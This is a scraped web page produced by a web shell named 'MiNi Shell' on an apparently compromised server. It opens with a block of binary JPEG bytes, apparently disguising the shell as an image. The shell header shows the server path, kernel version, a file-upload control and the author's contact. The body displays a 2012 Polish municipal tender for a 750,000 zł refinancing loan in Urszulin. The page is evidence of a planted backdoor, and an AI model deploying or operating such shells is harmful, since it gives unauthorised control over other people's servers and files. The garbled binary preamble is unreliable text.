JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120726/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20120726/270930-N-2012.html

<p class="kh_header"><b>Urszulin: Udzielenie  kredytu długoterminowego z przeznaczeniem na spłatę wcześniej zaciągniętych pożyczek i kredytów.</b><br>
<b>Numer ogłoszenia: 270930 - 2012; data zamieszczenia: 26.07.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Urszulin , ul. Kwiatowa 35, 22-234 Urszulin, woj. lubelskie, tel. 082 5713001, faks 082 5713001.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.ugurszulin.bip.mbnet.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Udzielenie  kredytu długoterminowego z przeznaczeniem na spłatę wcześniej zaciągniętych pożyczek i kredytów..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia publicznego jest udzielenie  kredytu długoterminowego z przeznaczeniem na spłatę wcześniej zaciągniętych pożyczek i kredytów  
  1.   Kwota kredytu 750.000,- zł;
  2.   Okres kredytowania - od podpisania umowy do dnia 31.12.2020 r.
  3.   Do wyliczenia należy przyjąć uruchomienie kredytu w jednej  transzy od m/ca września  
       2012 r. Do wyliczenia kosztów  kredytu należy przyjmować uruchomienie  kredytu  01 
       września 2012 roku.  
  4. Spłata kapitału kredytu w złotych polskich będzie następowała we wskazanych  miesiącach   
      do końca  każdego miesiąca, z karencją spłaty pierwszej raty kapitałowej do 31.12.2012 r.  
      włącznie.   
      Spłata pierwszej raty w styczniu 2013 r., a ostatniej raty w grudniu 2020 r., z możliwością      
      wcześniejszej spłaty całości lub części kredytu bez pobrania od tej czynności prowizji lub opłat 
      przez bank.

Harmonogram spłaty rat kapitałowych
31.01.2013r. -8 000,00 zł.	31.08.2016r. - 12 000,00 zł. 
28.02.2013r. - 8 000,00 zł.	31.10.2016r. - 12 000,00 zł.
31.03.2013r. - 8 000,00 zł. 	31.12.2016r. - 12 000,00 zł.
30.04.2013r. - 8 000,00 zł.	31.01.2017r. - 12 000,00 zł. 
31.05.2013r. - 8 000,00 zł.	28.02.2017r. - 12 000,00 zł.
30.06.2013r. - 8 000,00 zł.	30.04.2017r. - 12 000,00 zł.
31.07.2013r. - 8 000,00 zł. 	31.05.2017r. - 12 000,00 zł. 
31.08.2013r. - 8 000,00 zł.	31.07.2017r. - 12 000,00 zł.
30.09.2013r. - 8 000,00 zł.	31.08.2017r. - 12 000,00 zł.
31.10.2013r. - 8 000,00 zł. 	31.10.2017r. - 12 000,00 zł. 
30.11.2013r. - 10 000,00 zł. 	31.12.2017r. - 12 000,00 zł. 
31.12.2013r. - 10 000,00 zł.	31.01.2018r. - 12 000,00 zł.
31.01.2014r. - 10 000,00 zł.	28.02.2018r. - 12.000,00 zł.
28.02.2014r. - 5 000,00 zł. 	30.04.2018r. - 12 000,00 zł.
31.03.2014r. - 5 000,00 zł. 	31.05.2018r. - 12.000,00 zł. 
30.04.2014r. - 25 000,00 zł.	 31.07.2018r. - 12 000,00 zł.
31.05.2014r. - 5 000,00 zł.	 31.08.2018r. - 12 000,00 zł.
30.06.2014r. - 5 000,00 zł. 	 31.10.2018r. - 12 000,00 zł.
31.07.2014r. - 5 000,00 zł. 	 31.12.2018r. - 12 000,00 zł.
31.08.2014r. - 5 000,00 zł.	 28.02.2019r. - 6 000,00 zł.
30.09.2014r. - 5 000,00 zł.	 31.05.2019r. - 8 000,00 zł.
31.10.2014r. - 5 000,00 zł. 	 31.07.2019r. - 8 000,00 zł.
30.11.2014r. - 20 000,00 zł. 	 31.08.2019r. - 8 000,00 zł.
31.12.2014r. - 25 000,00 zł.	 31.10.2019r. - 8 000,00 zł.
31.01.2015r. - 10 000,00 zł.	31.12.2019r. - 8 000,00 zł.
30.04.2015r. - 10 000,00 zł. 	         31.01.2020r. - 17 000,00 zł.
          30.09.2015r.- 10 000,00 zł.	        28.02,2020r.- 17 000,00 zł.
          30,11.2015r. - 10 000,00 zł.	       30.04.2020r. - 17 000,00 zł.
         31,12,2015r. - 10 000,00 zł.	       31.05.2020r. - 17 000,00 zł.
         31.01.2016r. - 12 000,00 zł.	       30.06.2020r.- 10 000,00 zł.
         28.02.2016r, - 12 000,00 zł.	       31.07.2020r. - 17 000,00zł.
         30.04.2016r. - 12 000,00 zł.	      31.08.2020r. - 17 000,00 zł.
         31.05.2016r. - 12000,00 zł.	     31.10.2020r.- 17 000,00zł.
       31.07.2016r. - 12 000,00 zł.	     31.12.2020r. - 17 000,00 zł.


5.	Spłata rat odsetkowych będzie następowała w terminach miesięcznych, do  końca 
       każdego miesiąca za miesiąc poprzedni bez okresu karencji z wyjątkiem odsetek płatnych za 
       grudzień 2020 które będą płatne wraz z ratą kredytu,.
  6.  W przypadku gdy termin spłaty kredytu, przypadnie w dzień wolny od pracy, Zamawiający
       ureguluje wymaganą ratę w pierwszy dzień roboczy następujący po wyznaczonej dacie    
       spłaty.
  7.  Cenę ofertową - Co stanowią:  Koszty oprocentowania Ko - wyliczone w oparciu o stałą
       stopę oprocentowania kredytu złotowego, równą stawce WIBOR 1M - 4,91 % (z dnia    
      10.07.2012), powiększoną  o marżę  proponowaną  przez bank,  wyrażoną w punktach
      procentowych, niezmienną w okresie obowiązywania umowy,   
      zamawiający nie dopuszcza zastosowanie przez banki uczestniczące  w  postępowaniu ,     
    prowizji przygotowawczej. Oferty wykonawców, którzy zaoferują prowizję przygotowawczą  
      będą  odrzucone.
  8. Oprocentowanie kredytu w okresie kredytowania oparte będzie na zmiennej stawce 
      WIBOR 1M. Do sporządzenia oferty przetargowej należy przyjąć WIBOR 1M w wysokości i z    
      dnia określonego w specyfikacji istotnych warunków zamówienia.
  9. Wykonawcy powinni przyjąć do obliczenia ceny udzielenia kredytu, rzeczywistą    
      liczbę dni występującą w danym roku.
10. Zmienność stawki WIBOR 1M, która ma stanowić podstawę oprocentowania 
kredytu w okresie kredytowania, ustalona będzie dla kolejnych okresów	 obrachunkowych według notowań na dwa dni kalendarzowe poprzedzające rozpoczęcie danego okresu obrachunkowego.
11.Rzeczywiste koszty obsługi  kredytu będą stanowić : oprocentowanie kredytu :  zmienne,   
      obliczane  dla  każdego  miesięcznego okresu  odsetkowego  w  oparciu o jednomiesięczny  
   wskaźnik WIBOR  powiększony o marżę określoną w ofercie,  wyrażoną w punktach 
      procentowych, niezmienną w okresie obowiązywania umowy.
 12.Zamawiający zastrzega, iż niezależnie od wysokości wykorzystanej kwoty kredytu w 
      2012 r., bank nie będzie pobierał prowizji lub opłat za zaangażowanie w przypadku  
      wykorzystania kredytu niższego niż przyznana kwota. Oferty wykonawców, które będą 
     przewidywały prowizję lub opłaty za zaangażowanie, będą odrzucone.
13. Uruchomienie kredytu będzie następowało w 2012 r. na podstawie pisemnej dyspozycji
      Zamawiającego w terminach i kwotach wskazanych w w/w dyspozycjach.
14. Zamawiający zastrzega, iż oprocentowanie kredytu będzie liczone od kwoty faktycznie
       wykorzystanego kredytu.
15. Zamawiający posiada opinię w sprawie możliwości spłaty kredytu będącego  
      przedmiotem zamówienia, którą opublikowaną na stronie bip:
      www.ugurszulin.bip.mbnet.pl;
16. Zabezpieczeniem spłaty kredytu będzie weksel własny in blanco wraz z deklaracją
      wekslową..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 66.11.30.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2020.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>

<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>

<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.ugurszulin.bip.mbnet.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY URSZULIN, ul. Kwiatowa 35, 22-234 Urszulin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.08.2012 godzina 12:00, miejsce: Sekretariat  Urzędu Gminy Urszulin , 22-234 Urszulin, ul. Kwiatowa 35..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com